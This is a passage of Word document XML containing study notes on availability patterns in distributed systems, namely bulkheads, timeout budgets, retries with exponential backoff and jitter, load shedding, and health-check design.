          <w:bCs/>
        </w:rPr>
        <w:t>Fallback behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> When the circuit is open, what do you return? Cached response? Default value? Error? This is business-logic specific.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749E1530" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Netflix's Hystrix (now Resilience4j) popularized this. Each downstream dependency gets its own circuit breaker with its own thread pool (bulkhead pattern), preventing one bad dependency from consuming all threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9FD389" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="10B7158C">
          <v:rect id="_x0000_i1692" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61832DC5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Bulkhead Pattern — Isolation for Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FDA47" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Named after ship bulkheads</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> that prevent a hull breach from flooding the entire ship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E584FF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572C151C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Isolate resources for different workloads or dependencies so one failure doesn't consume everything:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132BCBF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread pool isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Each downstream service gets a dedicated thread pool. If Service B's pool exhausts (because B is slow), Service A's core functionality (which doesn't need B) continues on its own thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227FC29B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Connection pool isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Separate database connection pools for critical vs. non-critical queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A597845" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Run different workloads in separate processes/containers so one crashing doesn't affect others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7567BF3D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Infrastructure isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Critical services on dedicated clusters, not sharing with batch jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28206EA3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The tradeoff:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Resource efficiency decreases. You're pre-allocating resources that may sit idle. But you're buying isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F413735" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="5AC25E8B">
          <v:rect id="_x0000_i1693" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EFDDD9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Timeouts and Retries — The Devil is in the Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E8F65" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FED0F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why they matter for availability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E62A59" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Without timeouts, a single slow downstream can hold resources indefinitely, eventually exhausting your capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F36044" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC0D290" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> How long to wait to establish a TCP connection. Should be short (1–5 seconds). If you can't connect in 5s, the server is probably down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525AD18D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read/write timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> How long to wait for data after connection is established. Depends on expected operation time. A simple API call: 1–5s. A complex report generation: maybe 30s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125F627" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idle timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> How long to keep an idle connection open before recycling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2860E72C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Critical detail — timeout budget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289154E2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If Service A calls B which calls C:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A723588" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A's timeout to B: 5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C9948" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>B's timeout to C: 3 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59112C7B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>B needs time to process C's response. If both are 5s, A might time out while B is still waiting for C, causing A to retry, creating duplicate work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E455E9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rule:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Downstream timeouts must be strictly less than upstream timeouts, with margin for processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC07C5A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10.2 Retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F3EB8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Naive retries are dangerous:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C60840" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If a server is overloaded and returning errors, immediate retries increase load by 2x, 3x, etc. (retry storm). This is the #1 way retries make outages worse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3773FD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proper retry strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13698AC1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exponential backoff:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Wait 1s, then 2s, then 4s, then 8s between retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FCB96C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Jitter:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Add randomness to prevent thundering herd. Without jitter, all clients retry at exactly the same intervals (1s, 2s, 4s...), creating synchronized spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44623DA0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Full jitter: sleep = random(0, base * 2^attempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2F15B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Equal jitter: sleep = base * 2^attempt / 2 + random(0, base * 2^attempt / 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851D573" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry budget:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Limit total retries across the system. E.g., "no more than 10% of requests should be retries." If you're already at 10% retry rate, stop retrying — the system is genuinely failing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667668C1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Only retry operations that are safe to repeat. A retry of "create order" without an idempotency key creates duplicate orders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679D94FE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="6DB1EDA9">
          <v:rect id="_x0000_i1694" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369CF28" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Graceful Degradation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D072D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Philosophy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> It's better to serve partial/degraded functionality than to be completely unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1949146E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Examples and how they work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A17397" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Feature toggles/kill switches:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> When a non-critical service fails (recommendations, personalization), disable that feature dynamically. The page loads without recommendations rather than failing entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC211B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read from cache when DB is down:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Serve stale data rather than no data. Users see slightly outdated information (acceptable for many use cases) instead of an error page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEEB398" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load shedding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> When overloaded, explicitly reject a percentage of requests (return 503) to protect the remaining requests from degradation. Without load shedding, ALL requests become slow. With it, some fail fast but others succeed normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C9D32" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Priority-based degradation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Under load, serve paying customers first. Free-tier users get 503s while premium users continue normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD74BDF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How load shedding works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61869981" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Monitor request queue depth or response latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBCE7F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When latency exceeds threshold (e.g., p99 &gt; 2s), begin rejecting requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED8F70" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Rejection can be random (simple), priority-based (better), or LIFO-based (reject oldest requests first, since their clients have likely already timed out).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A4A974" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="5DF74D33">
          <v:rect id="_x0000_i1695" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3205CB51" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Health Checking — Deep Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2355A5CA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Shallow vs. Deep Health Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C5F52D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shallow (liveness):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> "Is the process running?" Just returns 200 OK. Proves the HTTP server is up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705B7B10" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deep (readiness):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> "Can this service actually serve requests?" Checks database connectivity, cache reachability, disk space, dependent services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D0C1A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The danger of deep health checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15FB84" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If your health check verifies the database, and the database has a momentary hiccup (2 seconds), ALL your instances simultaneously fail their health checks. The load balancer removes ALL of them. Now you have zero capacity — a self-inflicted outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5EC806" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Best practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C8804" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Use shallow checks for load balancer routing (liveness).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AC26A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Use deep checks for readiness (can accept new traffic during startup).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B148DC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Monitor deep health internally for alerting, but don't couple it to traffic routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1444C610" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
